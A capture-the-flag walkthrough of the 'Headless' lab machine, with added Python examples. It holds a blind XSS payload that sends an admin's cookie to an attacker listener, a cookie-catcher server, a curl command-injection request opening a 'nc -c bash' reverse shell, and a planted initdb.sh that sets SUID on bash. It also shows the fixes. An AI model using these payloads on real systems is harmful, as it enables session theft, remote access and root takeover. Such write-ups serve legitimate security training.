Headless - Walkthrough

Headless is an easy-difficulty Linux machine that features a Python Werkzeug server hosting a website. The website has a customer support form, which is found to be vulnerable to blind Cross-Site Scripting (XSS) via the User-Agent header. This vulnerability is leveraged to steal an admin cookie, which is then used to access the administrator dashboard. The page is vulnerable to command injection, leading to a reverse shell on the box. Enumerating the user's mail reveals a script that does not use absolute paths, which is leveraged to get a shell as root.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.8 -oG allPorts

The scan reveals:

PORT      STATE  SERVICE
22/tcp    open   ssh
5000/tcp  open   upnp

A targeted scan shows:

  • SSH → OpenSSH 9.2p1 Debian
  • HTTP (5000) → Python Werkzeug server

We perform content discovery:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.11.8:5000/FUZZ -t 100 -mc all -fs 207

Discovered endpoints: /dashboard, /support

[Screenshot: the /support contact form]

Foothold

The /support page contains a contact form. The submitted request, including its User-Agent header, is later rendered unescaped in an admin panel, so a payload placed in User-Agent executes in the administrator's browser. Nothing is reflected back to us, which makes this blind XSS: we only learn it fired when the admin's browser calls back to a listener on our machine (10.10.14.52). We send the form with the following payload in the User-Agent header, which redirects the admin's browser to our listener with document.cookie in the query string:

<script>
  document.location = "http://10.10.14.52/?c=" + document.cookie;
</script>

The listener receives a GET /?c=... request from the admin's browser carrying the cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 (the first part base64-decodes to "admin"; the part after the dot is a server-side signature, so the value cannot simply be forged, which is why stealing it was necessary).
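As an added example (not code from the original walkthrough), here is a minimal catcher for the blind-XSS callback together with a decoder for the cookie it delivers. It assumes the payload above redirects the admin's browser to http://10.10.14.52/?c=<document.cookie>, so the cookie arrives as the c query parameter of a GET request; the sample request path is constructed from the walkthrough's cookie value, and the listener port is an assumption. The cookie's payload.signature layout matches the itsdangerous/Flask signer format, which is treated here as an assumption rather than something the page states.

```python
"""Added example, not the original walkthrough's code: catch the blind-XSS
callback and decode the cookie it carries.

Assumptions: the payload sends the admin's browser to /?c=<document.cookie>
on our listener; the 'payload.signature' layout is the itsdangerous/Flask
signer format; listener port 80 is arbitrary.
"""
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the request path the admin's browser produces once the
# payload fires (document.cookie is appended raw, so '=' is not encoded).
SAMPLE_PATH = "/?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0"


def cookies_from_callback(path: str) -> dict:
    """Extract name=value cookie pairs from the 'c' query parameter."""
    raw = parse_qs(urlsplit(path).query).get("c", [""])[0]
    pairs = {}
    for chunk in raw.split(";"):          # document.cookie separates cookies with '; '
        chunk = chunk.strip()
        if "=" in chunk:
            name, value = chunk.split("=", 1)
            pairs[name] = value
    return pairs


def decode_signed_cookie(value: str) -> tuple:
    """Split 'payload.signature' and base64-decode the payload.

    The signature is an HMAC over the payload keyed with the server's secret,
    so we can read what the cookie says ("admin") but cannot mint a new one;
    that is why the cookie has to be stolen rather than forged.
    """
    payload_b64, _, signature = value.partition(".")
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)   # restore stripped padding
    payload = base64.urlsafe_b64decode(padded).decode()
    return payload, signature


class Catcher(BaseHTTPRequestHandler):
    """Log every cookie that arrives and reply with an empty 204."""

    def do_GET(self):
        for name, value in cookies_from_callback(self.path).items():
            print(f"[+] {name} = {value}")
            if "." in value:
                payload, _ = decode_signed_cookie(value)
                print(f"    payload decodes to {payload}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):         # silence the default access log
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), Catcher).serve_forever()
```

Run it on the attacking host before submitting the form; once the admin's browser follows the redirect, the cookie is printed and can be pasted into the curl requests that follow.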

Sending the stolen cookie in a Cookie header grants access to /dashboard. The dashboard takes a date parameter via POST to generate a report; appending a shell metacharacter shows the value is passed unsanitized to a shell, i.e. command injection (the ls output comes back in the response):

curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0" --data-binary "date=2023-09-15;ls" http://10.10.11.8:5000/dashboard

We exploit it to gain a reverse shell. With a listener waiting on our machine (nc -lvnp 5000), we send the following request; the + characters are decoded as spaces by the form-urlencoded parser, so the shell sees nc -c bash 10.10.14.52 5000:

curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0" --data-binary "date=2023-09-15;nc+-c+bash+10.10.14.52+5000" http://10.10.11.8:5000/dashboard
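The following is an added example, not the box's actual dashboard code, showing why the date parameter is injectable and what the hardened handler looks like. It assumes the dashboard concatenates the date into a shell command (consistent with ";ls" executing); the echo command stands in for the real report script so the demo runs anywhere, and the function names are invented.

```python
"""Added example, not the box's code: a command-injectable 'report for date'
handler next to its hardened form.

Assumption: the real dashboard builds a shell command string from the date
parameter. 'echo' replaces the real report script so this runs stand-alone.
"""
import re
import subprocess
from datetime import date

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def build_command_vulnerable(user_date: str) -> str:
    """String concatenation handed to a shell: ';' ends our command and
    whatever follows runs with the web server's privileges."""
    return "echo report for " + user_date


def shell_demo(user_date: str) -> str:
    """Run the vulnerable command the way os.system()/shell=True would."""
    result = subprocess.run(build_command_vulnerable(user_date), shell=True,
                            capture_output=True, text=True)
    return result.stdout


def is_valid_date(user_date: str) -> bool:
    """Allowlist: exact YYYY-MM-DD shape and a real calendar date."""
    if not DATE_RE.match(user_date):
        return False
    try:
        date.fromisoformat(user_date)      # rejects 2023-13-45 and similar
    except ValueError:
        return False
    return True


def validate_date(user_date: str) -> str:
    if not is_valid_date(user_date):
        raise ValueError("date must be YYYY-MM-DD")
    return user_date


def build_command_safe(user_date: str) -> list:
    """argv list with no shell: metacharacters are just bytes in one argument,
    and the allowlist rejects them before they get that far."""
    return ["echo", "report for", validate_date(user_date)]


def safe_demo(user_date: str) -> str:
    result = subprocess.run(build_command_safe(user_date),
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    injected = "2023-09-15;echo INJECTED"
    print("vulnerable output:", shell_demo(injected))       # second line: INJECTED
    print("safe output     :", safe_demo("2023-09-15"))
    try:
        safe_demo(injected)
    except ValueError as err:
        print("safe rejects    :", err)
```

The two defences are independent: the argv list stops the shell from interpreting the input, and the allowlist stops unexpected values reaching the report script at all. Either alone would have blocked the payload on this box; both together is the usual recommendation.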

The listener receives a shell as the user dvir. The user flag is in dvir's home directory:

cat user.txt

User flag: 29ed468da22ba93b04fa63ac4fbb4493

Privilege Escalation

We check sudo privileges:

sudo -l
User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

syscheck runs as root and, when it decides the database service is not running, executes ./initdb.sh, a path relative to the caller's working directory rather than an absolute one. sudo preserves the working directory, so whatever initdb.sh exists in the directory we run it from is executed as root. We create a malicious initdb.sh in our current directory that sets the SUID bit on bash:

echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh

We execute the syscheck script:

sudo /usr/bin/syscheck
Database service is not running. Starting it...
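To show exactly why the relative path matters, here is an added example (not the box's syscheck script) that reproduces the bug in a temporary directory and demonstrates the fix. It assumes, as the page describes, that syscheck runs ./initdb.sh when it thinks the database is down; the mock syscheck is a two-line shell script written by the harness, the root action is replaced by creating a marker file so the demo is safe to run as any user, and the scripts are invoked through sh so the demo does not depend on exec permissions on the temp filesystem.

```python
"""Added example, not the box's syscheck: reproduce the './initdb.sh'
relative-path bug in a temp directory and show the absolute-path fix.

Assumptions: the mock syscheck below stands in for the real one; writing a
marker file stands in for 'chmod u+s /bin/bash'; scripts are run via 'sh'
rather than relying on the execute bit on the temp filesystem.
"""
import subprocess
import tempfile
from pathlib import Path


def run_syscheck(use_absolute_path: bool) -> bool:
    """Return True if the attacker-planted initdb.sh ran."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        trusted = root / "opt"          # where the helper is supposed to live
        attacker_cwd = root / "home"    # where the attacker runs sudo from
        trusted.mkdir()
        attacker_cwd.mkdir()
        marker = root / "pwned"

        # The legitimate helper, in the location the script author expected.
        (trusted / "initdb.sh").write_text("#!/bin/sh\nexit 0\n")

        # The attacker's file in their working directory (constructed stand-in
        # for 'echo "chmod u+s /bin/bash" > initdb.sh').
        (attacker_cwd / "initdb.sh").write_text(f"#!/bin/sh\ntouch '{marker}'\n")

        # Vulnerable: './initdb.sh' resolves against the caller's cwd.
        # Fixed: an absolute path resolves the same way regardless of cwd.
        helper = str(trusted / "initdb.sh") if use_absolute_path else "./initdb.sh"
        syscheck = trusted / "syscheck"
        syscheck.write_text(
            "#!/bin/sh\n"
            "echo 'Database service is not running. Starting it...'\n"
            f"sh {helper}\n"
        )

        # sudo keeps the caller's working directory, so the mock runs from it.
        subprocess.run(["sh", str(syscheck)], cwd=attacker_cwd,
                       check=True, capture_output=True)
        return marker.exists()


if __name__ == "__main__":
    print("relative path, attacker file executed:", run_syscheck(False))  # True
    print("absolute path, attacker file executed:", run_syscheck(True))   # False
```

The same class of bug appears with bare command names that rely on PATH; the fix is the same, and sudo's secure_path only helps with PATH lookups, not with an explicit ./ reference like this one.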

Our initdb.sh ran as root and the SUID bit is now set on /bin/bash (verify with ls -l /bin/bash). We escalate with bash -p, which keeps the effective UID of root instead of dropping privileges:

bash -p

Root flag obtained:

cat /root/root.txt

Root flag: 3cc7ca87466e1f3363ff9fe479375b95